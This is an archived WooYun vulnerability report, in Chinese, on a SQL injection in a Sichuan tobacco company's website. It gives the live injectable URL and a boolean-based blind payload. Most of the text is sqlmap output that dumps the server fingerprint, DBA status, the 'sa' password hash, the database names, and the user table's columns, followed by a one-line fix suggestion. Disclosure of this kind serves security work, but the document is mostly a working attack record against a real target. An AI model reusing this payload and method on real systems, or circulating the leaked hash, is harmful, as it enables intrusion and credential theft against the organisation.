乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-11: 细节已通知厂商并且等待厂商处理中 2014-11-14: 厂商已经确认,细节仅向厂商公开 2014-11-24: 细节向核心白帽子及相关领域专家公开 2014-12-04: 细节向普通白帽子公开 2014-12-14: 细节向实习白帽子公开 2014-12-26: 细节向公众公开
四川烟草工业SQL注射漏洞
1.注射点
http://www.scti.cn/Cpzs.aspx?id=62 (GET)
2.注射信息
sqlmap identified the following injection points with a total of 568 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000current user is DBA: Truedatabase management system users password hashes:[*] sa [1]: password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7 header: 0x0100 salt: e91f3a04 mixedcase: fdf44e6586452bfb91e24c7819156597b34a5bea uppercase: 80ef1526af4f7a2a5274a0d6581c3f0495fa8be7available databases [11]:[*] master[*] model[*] msdb[*] Northwind[*] ProductionManage[*] ProductionPlanManage[*] pubs[*] scgy_cd[*] scgyWW[*] tempdb[*] WebSite2014sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000current database: 'WebSite2014'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: WebSite2014[39 tables]+----------------------------+| dtproperties || sysconstraints || syssegments || v_dm_location || v_getdate || v_xt_dept || v_xt_organise || v_xt_t_user || ww_attached_property_group || ww_attached_property_set || ww_attached_property_value || ww_base_info || ww_content || ww_content_adjunct || ww_friend_website || ww_invite_adjunct || ww_invite_content || ww_mod || ww_query_authority || ww_visits_info || xt_t_data_dict || xt_t_error_log || xt_t_function_mod || xt_t_log || xt_t_log_info || xt_t_log_set || xt_t_mod_access || xt_t_mod_access_detail || xt_t_modulehelp || xt_t_organise || xt_t_param_enum_type_value || xt_t_parameter || xt_t_parameter_disp_rows || xt_t_parameter_type || xt_t_role || xt_t_role_popedom || xt_t_shortcut_function || xt_t_user || xt_t_user_role |+----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: Generic boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: WebSite2014Table: xt_t_user[11 columns]+---------------+----------+| Column | Type |+---------------+----------+| keyid | numeric || note_date | datetime || person_id | numeric || remark | varchar || sort_id | int || unitid | varchar || use_flag | char || user_account | varchar || user_name | varchar || user_password | varchar || userid | varchar |+---------------+----------+
database management system users password hashes:[*] sa [1]: password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7 header: 0x0100 salt: e91f3a04 mixedcase: fdf44e6586452bfb91e24c7819156597b34a5bea uppercase: 80ef1526af4f7a2a5274a0d6581c3f0495fa8be7available databases [11]:[*] master[*] model[*] msdb[*] Northwind[*] ProductionManage[*] ProductionPlanManage[*] pubs[*] scgy_cd[*] scgyWW[*] tempdb[*] WebSite2014
修复注射点
危害等级:中
漏洞Rank:9
确认时间:2014-11-14 17:36
暂无